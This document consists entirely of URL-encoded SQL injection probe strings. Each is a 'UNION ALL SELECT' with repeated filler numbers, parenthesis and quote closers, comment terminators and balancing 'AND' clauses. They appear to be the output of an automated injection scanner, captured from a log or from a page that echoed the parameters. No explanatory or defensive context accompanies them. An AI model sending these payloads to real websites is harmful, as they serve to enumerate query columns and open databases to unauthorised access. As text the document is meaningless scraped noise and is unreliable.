-3497%29%29%29%20UNION%20ALL%20SELECT%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%23%20AND%20%28%28%289533%3D9533 -9602%29%29%29%20UNION%20ALL%20SELECT%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%23%20AND%20%28%28%285860%3D5860 -5055%29%29%29%20UNION%20ALL%20SELECT%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%23%20AND%20%28%28%282716%3D2716 -1495%29%29%29%20UNION%20ALL%20SELECT%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%2C%201091%23%20AND%20%28%28%284870%3D4870 -7130%20UNION%20ALL%20SELECT%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%23 -3635%20UNION%20ALL%20SELECT%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%23 -7609%20UNION%20ALL%20SELECT%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%23 -6346%20UNION%20ALL%20SELECT%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%23 -1091%20UNION%20ALL%20SELECT%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%23 -8042%20UNION%20ALL%20SELECT%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%23 -2960%20UNION%20ALL%20SELECT%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%23 -5611%20UNION%20ALL%20SELECT%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%23 -5735%20UNION%20ALL%20SELECT%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%23 -3597%20UNION%20ALL%20SELECT%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%2C%204793%23 -2483%27%29%20UNION%20ALL%20SELECT%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%2C%202241%23%20AND%20%28%27FNrh%27%3D%27FNrh -3906%27%29%20UNION%20ALL%20SELECT%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%2C%206550%23%20AND%20%28%27ccny%27%3D%27ccny -8811%27%29%20UNION%20ALL%20SELECT%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%2C%208482%23%20AND%20%28%27jfvM%27%3D%27jfvM -4055%27%29%20UNION%20ALL%20SELECT%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%2C%201725%23%20AND%20%28%27ehGt%27%3D%27ehGt -1581%27%29%20UNION%20ALL%20SELECT%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%2C%201171%23%20AND%20%28%27RCUa%27%3D%27RCUa -2423%27%29%20UNION%20ALL%20SELECT%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%2C%205604%23%20AND%20%28%27MSzq%27%3D%27MSzq -1016%27%29%20UNION%20ALL%20SELECT%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%2C%202856%23%20AND%20%28%27FFEL%27%3D%27FFEL -9775%27%29%20UNION%20ALL%20SELECT%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%2C%205730%23%20AND%20%28%27vWbg%27%3D%27vWbg -2208%27%29%20UNION%20ALL%20SELECT%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%2C%202078%23%20AND%20%28%27qMyP%27%3D%27qMyP -7485%27%29%20UNION%20ALL%20SELECT%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%23%20AND%20%28%27MJZL%27%3D%27MJZL -4114%27%29%29%20UNION%20ALL%20SELECT%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%23%20AND%20%28%28%27HNUe%27%3D%27HNUe -9770%27%29%29%20UNION%20ALL%20SELECT%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%2C%204365%23%20AND%20%28%28%27kNtd%27%3D%27kNtd -5474%27%29%29%20UNION%20ALL%20SELECT%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%2C%207733%23%20AND%20%28%28%27tKge%27%3D%27tKge -7078%27%29%29%20UNION%20ALL%20SELECT%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%23%20AND%20%28%28%27fiqE%27%3D%27fiqE -8647%27%29%29%20UNION%20ALL%20SELECT%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%23%20AND%20%28%28%27Wzqy%27%3D%27Wzqy -3927%27%29%29%20UNION%20ALL%20SELECT%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%23%20AND%20%28%28%27nCUz%27%3D%27nCUz -1033%27%29%29%20UNION%20ALL%20SELECT%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%23%20AND%20%28%28%27PJnJ%27%3D%27PJnJ -7763%27%29%29%20UNION%20ALL%20SELECT%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%23%20AND%20%28%28%27QlqM%27%3D%27QlqM -5568%27%29%29%20UNION%20ALL%20SELECT%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%2C%208013%23%20AND%20%28%28%27ZZGn%27%3D%27ZZGn -6354%27%29%29%20UNION%20ALL%20SELECT%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%23%20AND%20%28%28%27fuDC%27%3D%27fuDC -7851%27%29%29%29%20UNION%20ALL%20SELECT%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%23%20AND%20%28%28%28%27TQsT%27%3D%27TQsT -1859%27%29%29%29%20UNION%20ALL%20SELECT%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%23%20AND%20%28%28%28%27cvsZ%27%3D%27cvsZ -4203%27%29%29%29%20UNION%20ALL%20SELECT%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%2C%209826%23%20AND%20%28%28%28%27mTkE%27%3D%27mTkE -7385%27%29%29%29%20UNION%20ALL%20SELECT%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%2C%204007%23%20AND%20%28%28%28%27qprN%27%3D%27qprN -1763%27%29%29%29%20UNION%20ALL%20SELECT%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%23%20AND%20%28%28%28%27ILJR%27%3D%27ILJR -1408%27%29%29%29%20UNION%20ALL%20SELECT%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%23%20AND%20%28%28%28%27RlxL%27%3D%27RlxL -1919%27%29%29%29%20UNION%20ALL%20SELECT%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%2C%208966%23%20AND%20%28%28%28%27HzSB%27%3D%27HzSB -8511%27%29%29%29%20UNION%20ALL%20SELECT%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%2C%201882%23%20AND%20%28%28%28%27jkQD%27%3D%27jkQD -4405%27%29%29%29%20UNION%20ALL%20SELECT%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%23%20AND%20%28%28%28%27Qmnw%27%3D%27Qmnw -2724%27%29%29%29%20UNION%20ALL%20SELECT%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%2C%204521%23%20AND%20%28%28%28%27wGWq%27%3D%27wGWq -6395%27%20UNION%20ALL%20SELECT%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%23%20AND%20%27tlYK%27%3D%27tlYK -4227%27%20UNION%20ALL%20SELECT%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%23%20AND%20%27LNyt%27%3D%27LNyt -4672%27%20UNION%20ALL%20SELECT%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%2C%203222%23%20AND%20%27afJi%27%3D%27afJi 